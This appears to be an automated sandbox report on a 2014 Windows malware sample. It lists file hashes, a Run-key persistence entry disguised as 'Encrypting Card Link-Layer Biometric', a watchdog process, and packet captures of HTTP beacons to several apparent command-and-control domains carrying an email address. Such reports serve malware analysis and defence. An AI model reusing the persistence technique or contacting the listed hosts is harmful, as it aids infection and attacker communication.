Analysis Date: 2014-10-01 16:59:30

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 1b672f70bcd669bcf753c67fc5c0233a sha1: 25c9238348456fe516948eecc0eb6d814345335e size: 296960
Section .rdata: md5: e92a966f09a2da29a17c6fd8c9bd68a4 sha1: b26a430c05a00ee7d9c17d063c0cb1f164e4f374 size: 35328 md5: 7a9e3815fc78192848e97c8e56e1060b sha1: 4010e6ca6cbebbc48efe3d66d547cd72d1d46040 size: 105472
Timestamp: 2014-07-24 05:39:50
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encrypting Card Link-Layer Biometric ➝ C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe

↳ C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.xug
Creates File: C:\Documents and Settings\Administrator\Application Data\vopqpfgb\xwvjuvjjvgoq.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vopqpfgb\iqtktxxpw.exe"

Network Details:
DNS queries: Type A (queried hostnames missing)
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20666f 72776172 64737472   Host: forwardstr
0x00000070 (00112)   65616d2e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206465 67726565 626f7474   Host: degreebott
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737373 74726561   Host: glassstrea
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737362 6f74746c   Host: glassbottl
0x00000070 (00112)   652e6e65 740d0a0d 0a0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206c65 61646572 73747265   Host: leaderstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207265 7475726e 73747265   Host: returnstre
0x00000070 (00112)   616d2e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a206465 67726565 62757369   Host: degreebusi
0x00000070 (00112)   6e657373 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20666f 72776172 64627573   Host: forwardbus
0x00000070 (00112)   696e6573 732e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d746672 61737572 6540636f   mail=tfrasure@co
0x00000020 (00032)   6d636173 742e6e65 74266d65 74686f64   mcast.net&method
0x00000030 (00048)   3d706f73 74204854 54502f31 2e300d0a   =post HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20676c 61737362 7573696e   Host: glassbusin
0x00000070 (00112)   6573732e 6e65740d 0a0d0a0d 0a

Strings:

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
bad allocation
bad exception
`Base Class Array'
`Base Class Descriptor at (
`Class Hierarchy Descriptor'
`Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
`Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
